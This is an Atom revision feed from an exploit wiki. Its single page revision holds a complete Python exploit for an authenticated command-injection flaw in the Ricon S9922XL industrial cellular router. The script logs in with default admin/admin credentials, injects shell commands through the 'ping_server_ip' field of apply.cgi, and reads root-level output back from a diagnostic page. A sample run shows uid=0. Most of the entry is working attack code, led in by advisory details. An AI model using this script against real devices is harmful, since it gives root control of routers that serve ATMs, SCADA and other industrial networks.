<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Ricon_Industrial_Cellular_Router_S9922XL_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E</id>
	<title>Ricon Industrial Cellular Router S9922XL 遠程代碼執行漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Ricon_Industrial_Cellular_Router_S9922XL_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Ricon_Industrial_Cellular_Router_S9922XL_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-17T01:57:23Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Ricon_Industrial_Cellular_Router_S9922XL_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=6423&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;&lt;pre&gt; # Exploit Title: Ricon Industrial Cellular Router S9922XL - Remote Command Execution (RCE)  # Date: 02.07.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://ww...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Ricon_Industrial_Cellular_Router_S9922XL_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=6423&amp;oldid=prev"/>
		<updated>2021-07-07T02:45:06Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;&amp;lt;pre&amp;gt; # Exploit Title: Ricon Industrial Cellular Router S9922XL - Remote Command Execution (RCE)  # Date: 02.07.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://ww...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: Ricon Industrial Cellular Router S9922XL - Remote Command Execution (RCE) &lt;br /&gt;
# Date: 02.07.2021&lt;br /&gt;
# Exploit Author: LiquidWorm&lt;br /&gt;
# Vendor Homepage: https://www.riconmobile.com&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
#!/usr/bin/env python3&lt;br /&gt;
# -*- coding: utf-8 -*-&lt;br /&gt;
#&lt;br /&gt;
#&lt;br /&gt;
# Ricon Industrial Cellular Router S9922XL Remote Command Execution&lt;br /&gt;
#&lt;br /&gt;
#&lt;br /&gt;
# Vendor: Ricon Mobile Inc.&lt;br /&gt;
# Product web page: https://www.riconmobile.com&lt;br /&gt;
# Affected version: Model: S9922XL and S9922L&lt;br /&gt;
#                   Firmware: 16.10.3&lt;br /&gt;
#&lt;br /&gt;
# Summary: S9922L series LTE router is designed and manufactured by&lt;br /&gt;
# Ricon Mobile Inc., it based on 3G/LTE cellular network technology&lt;br /&gt;
# with industrial class quality. With its embedded cellular module,&lt;br /&gt;
# it widely used in multiple case like ATM connection, remote office&lt;br /&gt;
# security connection, data collection, etc.&lt;br /&gt;
#&lt;br /&gt;
# The S9922XL-LTE is a mobile network router based on 4G/4.5G, WiFi&lt;br /&gt;
# and VPN technologies. Powerful 64-bit Processor and integrated real-time&lt;br /&gt;
# operating system specially developed by Ricon Mobile. S9922XL is&lt;br /&gt;
# widely used in many areas such as intelligent transportation, scada,&lt;br /&gt;
# POS, industrial automation, telemetry, finance, environmental protection.&lt;br /&gt;
#&lt;br /&gt;
# Desc: The router suffers from an authenticated OS command injection&lt;br /&gt;
# vulnerability. This can be exploited to inject and execute arbitrary&lt;br /&gt;
# shell commands as the admin (root) user via the 'ping_server_ip' POST&lt;br /&gt;
# parameter. Also vulnerable to Heartbleed.&lt;br /&gt;
#&lt;br /&gt;
# --------------------------------------------------------------------&lt;br /&gt;
# C:\&amp;gt;python ricon.py 192.168.1.71 id&lt;br /&gt;
# uid=0(admin) gid=0(admin)&lt;br /&gt;
# --------------------------------------------------------------------&lt;br /&gt;
#&lt;br /&gt;
# Tested on: GNU/Linux 2.6.36 (mips)&lt;br /&gt;
#            WEB-ROUTER&lt;br /&gt;
#&lt;br /&gt;
#&lt;br /&gt;
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic&lt;br /&gt;
#                             @zeroscience&lt;br /&gt;
#&lt;br /&gt;
#&lt;br /&gt;
# Advisory ID: ZSL-2021-5653&lt;br /&gt;
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5653.php&lt;br /&gt;
#&lt;br /&gt;
#&lt;br /&gt;
# 02.07.2021&lt;br /&gt;
#&lt;br /&gt;
&lt;br /&gt;
import requests,sys,re&lt;br /&gt;
&lt;br /&gt;
if len(sys.argv)&amp;lt;3:&lt;br /&gt;
    print(&amp;quot;Ricon Industrial Routers RCE&amp;quot;)&lt;br /&gt;
    print(&amp;quot;Usage: ./ricon.py [ip] [cmd]&amp;quot;)&lt;br /&gt;
    sys.exit(17)&lt;br /&gt;
else:&lt;br /&gt;
    ipaddr=sys.argv[1]&lt;br /&gt;
    execmd=sys.argv[2]&lt;br /&gt;
&lt;br /&gt;
data={'submit_class'  :'admin',&lt;br /&gt;
      'submit_button' :'netTest',&lt;br /&gt;
      'submit_type'   :'',&lt;br /&gt;
      'action'        :'Apply',&lt;br /&gt;
      'change_action' :'',&lt;br /&gt;
      'is_ping'       :'0',&lt;br /&gt;
      'ping_server_ip':';'+execmd}&lt;br /&gt;
&lt;br /&gt;
htreq=requests.post('http://'+ipaddr+'/apply.cgi',data=data,auth=('admin','admin'))&lt;br /&gt;
htreq=requests.get('http://'+ipaddr+'/asp/admin/netTest.asp',auth=('admin','admin'))&lt;br /&gt;
reout=re.search(&amp;quot;20\&amp;quot;&amp;gt;(.*)&amp;lt;/textarea&amp;gt;&amp;quot;,htreq.text,flags=re.S).group(1).strip('\n')&lt;br /&gt;
print(reout)&lt;br /&gt;
            &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>